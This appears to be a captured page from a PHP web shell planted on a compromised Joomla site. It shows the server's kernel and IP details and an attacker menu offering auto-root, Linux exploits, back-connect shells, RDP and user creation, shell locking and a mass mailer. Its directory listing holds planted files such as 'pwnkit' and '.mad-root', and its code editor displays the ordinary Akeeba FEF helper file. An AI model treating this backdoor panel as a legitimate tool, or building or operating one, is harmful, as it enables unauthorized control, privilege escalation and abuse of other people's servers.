Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.120.20.2 | : 216.73.216.49
Cant Read [ /etc/named.conf ]
8.5.7
verseaumee
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
verseaumee /
www /
media /
fef /
[ HOME SHELL ]
Name
Size
Permission
Action
css
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
adminer.php
0
B
-rw-r--r--
fef.php
5.45
KB
-rw----r--
pwnkit
0
B
-rwxr-xr-x
version.php
326
B
-rw----r--
version.txt
16
B
-rw----r--
worksec.php
1.06
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : fef.php
<?php /** * @package AkeebaFEF * @copyright Copyright (c)2017-2019 Nicholas K. Dionysopoulos / Akeeba Ltd * @license GNU General Public License version 3, or later */ // Protect from unauthorized access defined('_JEXEC') or die(); if (!defined('FOF30_INCLUDED') && !@include_once(JPATH_LIBRARIES . '/fof30/include.php')) { throw new RuntimeException('FOF 3.x is required by Akeeba FEF but it is not currently installed', 500); } if (!@include_once (__DIR__ . '/version.php') && !defined('AKEEBAFEF_VERSION')) { define('AKEEBAFEF_VERSION', 'dev'); define('AKEEBAFEF_DATE', gmdate('Y-m-d')); } class AkeebaFEFHelper { /** * Media versioning tag * * @var string */ public static $tag = null; /** * Is FEF already loaded? * * @var bool */ public static $loaded = false; /** * Loads Akeeba Frontend Framework, both CSS and JS * * @param bool $withReset Should I also load the CSS reset for the FEF container? * * @return void */ public static function load($withReset = true) { if (self::$loaded) { return; } if ($withReset) { self::loadCSS('fef/reset.min.css'); } self::loadCSS('fef/style.min.css'); self::loadJS('fef/tabs.min.js'); self::loadJS('fef/dropdown.min.js'); self::$loaded = true; } /** * Helper method to load a JavaScript file using the ever-changing Joomla! API. * * Special considerations: * * Always use the minified version of the file. Joomla! will autoamtically use the non-minified one if Debug Site is * enabled. If you use a .min.js extension the non-minified file is expected to have a .js extension. If your * minified file has a plain .js extension then the non-minified file will be called <original name>-uncompressed.js * * You can have browser-specific files, e.g. foo_firefox.min.js, foo_firefox_57.min.js etc. These are loaded * automatically instead of the foo.js file as needed. * * This method goes through Joomla's script loader, thus allowing template media overrides. The media overrides are * supposed to be in the templates/YOUR_TEMPLATE/js/fef folder for FEF. * * @param string $file The Joomla!-coded path of the file, e.g. 'foo/bar.min.js' for the JavaScript file * media/foo/js/bar.min.js * * @return void */ protected static function loadJS($file) { if (version_compare(JVERSION, '3.6.999', 'le')) { JHtml::_('script', $file, [ 'version' => self::getMediaVersion(), 'relative' => true, 'detectDebug' => true, ], false, false, false, true); } // Joomla! 3.7 is broken. We have to use the new method AND MAKE SURE $attribs IS NOT EMPTY. else { JHtml::_('script', $file, [ 'version' => self::getMediaVersion(), 'relative' => true, 'detectDebug' => true, 'framework' => false, 'pathOnly' => false, 'detectBrowser' => true, ], [ 'defer' => false, 'async' => false, ]); } } /** * Helper method to load a CSS file using the ever-changing Joomla! API. * * Special considerations: * * Always use the minified version of the file. Joomla! will autoamtically use the non-minified one if Debug Site is * enabled. If you use a .min.css extension the non-minified file is expected to have a .css extension. If your * minified file has a plain .css extension then the non-minified file will be called * <original name>-uncompressed.css * * You can have browser-specific files, e.g. foo_firefox.min.css, foo_firefox_57.min.css etc. These are loaded * automatically instead of the foo.css file as needed. * * This method goes through Joomla's script loader, thus allowing template media overrides. The media overrides are * supposed to be in the templates/YOUR_TEMPLATE/css/fef folder for FEF. * * @param string $file The Joomla!-coded path of the file, e.g. 'foo/bar.min.js' for the JavaScript file * media/foo/js/bar.min.js * * @return void */ protected static function loadCSS($file) { if (version_compare(JVERSION, '3.6.999', 'le')) { JHtml::_('stylesheet', $file, [ 'version' => self::getMediaVersion(), 'relative' => true, 'detectDebug' => true, ], true, false, false, true); } // Joomla! 3.7 is broken. We have to use the new method AND MAKE SURE $attribs IS NOT EMPTY. else { JHtml::_('stylesheet', $file, [ 'version' => self::getMediaVersion(), 'relative' => true, 'detectDebug' => true, 'pathOnly' => false, 'detectBrowser' => true, ], [ 'type' => 'text/css', ]); } } /** * Get the media versioning tag. If it's not set, create one first. * * @return string */ protected static function getMediaVersion() { if (empty(self::$tag)) { self::$tag = md5(AKEEBAFEF_VERSION . AKEEBAFEF_DATE . self::getApplicationSecret()); } return self::$tag; } /** * Return the secret key for the Joomla! installation. If we cannot get access to it we return the MD5 of the * current file's modification date and time. This is enough to obfuscate the media version enough to make sure that * two identical versions on two different sites will yield a different media version. * * @return mixed|string */ protected static function getApplicationSecret() { // Get the site's secret try { $app = \JFactory::getApplication(); if (method_exists($app, 'get')) { $secret = $app->get('secret'); } } catch (\Exception $e) { $secret = md5(filemtime(__FILE__)); } return $secret; } }
Close